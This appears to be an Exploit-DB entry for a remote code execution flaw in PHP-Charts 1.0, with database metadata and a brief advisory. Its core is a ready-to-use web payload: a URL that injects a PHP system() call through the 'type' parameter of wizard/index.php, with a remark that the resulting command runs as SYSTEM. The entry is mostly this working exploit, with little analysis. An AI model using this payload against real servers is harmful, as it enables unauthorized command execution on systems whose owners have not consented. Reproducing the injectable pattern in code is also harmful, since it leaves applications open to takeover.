PHP-Charts 1.0 - Code Execution
Author: fizzle stick
type: webapps
platform: php
port:
date_added: 2013-05-17
date_updated: 2013-05-19
verified: 1
codes: OSVDB-93563
tags:
aliases:
screenshot_url: http://www.exploit-db.com/screenshots/idlt25500/screen-shot-2013-05-19-at-105400-am.png
application_url: http://www.exploit-db.comphp-chart_v1.0.zip
# Exploit Title: PHP-CHARTS v1.0 code execution vulnerability
# Date: 05/15/2013
# Exploit Author: fizzle stick
# Vendor Homepage: http://php-charts.com/
# Software Link: http://php-charts.com/downloads/php-chart_v1.0.zip
# Version: v1.0
# Tested on: Windows
Summary: PHP-charts v1.0 suffers from a code execution vulerability in the
index.php page
Exploit:
http://192.168.1.120/phpcharts/wizard/index.php?type=';system('whoami');//
Result: If vulnerable the web service context will be displayed, usually
SYSTEM. ;D
####